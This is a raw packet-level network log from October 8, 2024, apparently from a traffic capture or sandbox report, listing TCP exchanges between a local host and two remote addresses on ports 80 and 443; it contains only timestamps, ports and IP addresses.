Oct 8, 2024 20:47:33.415091038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415118933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415134907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415153980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415169954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415292025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415527105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415580034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415581942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415613890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415632010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415647030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415666103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415679932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415690899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415730000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415739059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415791035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415792942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415824890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415837049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415859938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415874958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415893078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415909052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415925980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415940046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415961027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.415976048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.415996075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416011095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416029930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416045904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416064024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416079044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416114092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416116953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416151047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416162968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416183949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416197062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416235924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416243076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416276932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416294098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416310072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416326046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416342974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416362047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416393042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416395903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416429043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416445971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416461945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416476011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416513920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416513920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416548014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416564941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416580915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416598082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416615963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416630030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416665077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416666985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416701078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416717052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416737080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416749001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416769981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416786909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416802883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416820049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416836977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416855097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416871071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416887045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416903973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416923046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416937113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416949987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.416970015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.416986942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.417002916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.417017937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.417038918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.417053938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.417087078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.496862888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.496875048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.496886015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.496953964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.496978045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497072935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497072935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497072935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497102022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497136116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497191906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497318983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497370005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497406960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497442007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497494936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497497082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497529984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497546911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497562885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497582912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497598886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497613907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497634888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497684002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497700930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497733116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497752905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497769117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497775078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497803926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497818947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497853994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497869968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497901917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497920036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497936010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497953892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.497970104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.497986078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498003960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498019934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498054028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498074055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498107910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498126030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498157978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498231888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498264074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498289108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498302937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498320103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498337030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498368979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498370886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498384953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498399973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498425961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498434067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498456001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498466969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498478889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498501062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498517036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498533964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.498548031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.498580933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500299931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500354052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500358105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500390053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500406981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500439882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500443935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500488997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500497103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500530958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500544071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500564098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500597954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500617027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500633001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500642061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500667095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500679016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500699997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500718117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500734091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500754118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500783920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500808954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500842094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500859976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500891924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.500952959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.500987053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.501009941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.501019955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.501034975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.501054049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.501089096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.501106024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.501121998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.501142979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.501158953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.501174927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.501210928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.501982927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502036095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502037048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502069950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502079964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502121925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502124071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502157927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502177000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502192020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502206087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502229929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502239943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502269030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502284050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502298117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502320051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502346039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.502351046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.502402067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.872524023 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.873081923 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.873128891 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.873675108 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.873693943 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.976496935 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.976530075 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.976573944 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.976615906 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.976664066 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.976959944 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.976994991 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.977030039 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.977045059 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.979717970 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.979799986 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.979881048 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.980026007 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.980047941 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.026621103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:34.026640892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:34.032562971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:34.032577038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:34.037303925 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.037733078 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.037754059 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.038254976 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.038265944 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.055491924 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.059545040 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.059576035 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.059950113 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.059957027 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.086179018 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.087563992 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.087606907 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.087924957 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.087935925 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.137929916 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.138142109 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.138263941 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.138514042 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.138547897 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.138575077 CEST	49839	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.138590097 CEST	443	49839	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.142669916 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.142702103 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.142898083 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.142898083 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.142929077 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.161472082 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.162730932 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.162818909 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.162909985 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.162909985 CEST	49838	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.162955046 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.162981033 CEST	443	49838	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.165194035 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.165215015 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.165359974 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.165426016 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.165431023 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.196563959 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.196625948 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.196702957 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.196856976 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.196881056 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.196897030 CEST	49837	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.196904898 CEST	443	49837	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.199455023 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.199523926 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.199609995 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.199738979 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.199764013 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.211762905 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.211812973 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.212204933 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.212205887 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.212205887 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.214653015 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.214714050 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.215254068 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.215379953 CEST	49844	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.215420961 CEST	443	49844	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.420433998 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.420491934 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.677637100 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.678203106 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.678252935 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.678622007 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.678634882 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.781944990 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.781970978 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.782012939 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.782037973 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.782083035 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.782315969 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.782315969 CEST	49840	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.782346964 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.782371044 CEST	443	49840	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.785072088 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.785166025 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.785326958 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.785478115 CEST	49845	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.785511017 CEST	443	49845	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.790452003 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.790930986 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.790946007 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.791639090 CEST	49841	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.791645050 CEST	443	49841	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.864788055 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.865324020 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.865351915 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.865744114 CEST	49843	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.865756035 CEST	443	49843	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.868901968 CEST	443	49842	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:34.869396925 CEST	49842	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:34.869415998 CEST	443	49842	13.107.246.60	192.168.2.5
